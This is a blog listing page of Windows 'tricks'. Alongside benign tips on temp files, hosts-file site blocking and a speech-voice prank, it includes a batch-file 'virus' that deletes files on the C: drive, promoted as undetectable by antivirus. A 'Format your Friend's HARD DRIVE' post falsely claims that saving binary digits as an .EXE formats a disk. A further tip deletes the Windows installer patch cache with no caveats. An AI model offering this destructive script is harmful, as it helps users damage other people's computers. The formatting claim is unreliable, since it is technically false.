Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Remove unused windows update patch files

Description:-

In this tutorials we will see how to remove windows update patch file which file we does not need in system. Here is the solution to remove those files and keep your system fast. Follow this step to remove it.
Step 1:- open command prompt run as system administrator mode.

Step 2:- type below command in your command prompt to remove unused windows update patch files.

rmdir /q /s %WINDIR%\Installer\$PatchCache$

wait until process complete.

Step 3:- now open your My Computer and check in your C:\ Drive.

Note: - If you have removed your patch file once then again you cannot run this command again because already you have removes your patch file from that directory.

Remove temp data from computer

Description:-

In this tricks we will see how to remove temp file data to avoid files which files we want to use more. Here is the step to remove temp files data from your C:\ drive.

Step 1:-

Open your run window or else type "Win + r".


Ant type in run window "%temp%" and hit Enter.
You’re temp file location window will open. Select all and press "Shift + Del" and remove it.
Make Dangerous Virus or Delete all files from C:\ Drive

Make Dangerous Virus or Delete all files from C:\ Drive

Description:-

In this post I will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any Antivirus. 

What this virus will do?  
 
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.
 
How to make the virus?

   1. Open Notepad and copy below code into it. 

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Block Sites On Computer Without Using Software

 
Description:- 

In this article, we will see about how to block any websites on your computer. There are thousands of software’s are available on internet to block websites but, in this article, you are going to learn how to block sites on computer without using any software. 

It is very easy to block sites on computer without any software. This trick will work on Windows XP, Windows Vista, and Windows 7. I have tried this trick on all windows and it really works. Follow the steps below to learn how to block sites on computer. 

1.       Go to Run(Windows Key + R)
2.       Type C:/windows/system32/drivers/etc/hosts
3.       Hit enter
4.       Open the file as Notepad
5.       Type 127.0.0.1 www.yoursitedomain.com below 127.0.0.1 local host
6.       Save it.

Format your Friend’s HARD DRIVE

Format your Friend’s HARD DRIVE


Description:-

In this tutorial we will see about how to format hard drive using cool notepad tricks. Follow below step and do your hard drive will be format. 
  1. Write The Following In Notepad Exactly as it says
  2. Write the following code:01001011000111110010010101010101010000011111100000
  3. Save As it “FormatDrive.EXE”.
  4. If u run the program means it will format the Hard Drive.

 

Is Your Computer Male Or Female ?


Description:-

This is funny trick that let you know the gender of your computer whether it is male or female. This trick work on mostly all windows operating system. Here is the step you have to do. 

1) Open Notepad and paste the following codes.

    CreateObject("SAPI.SpVoice").Speak"I love you" 

2) Save the file as "gender.vbs"
3) Now, open the save file.
4) If you hear male voice then your computer is male and if you hear female voice then it’s female.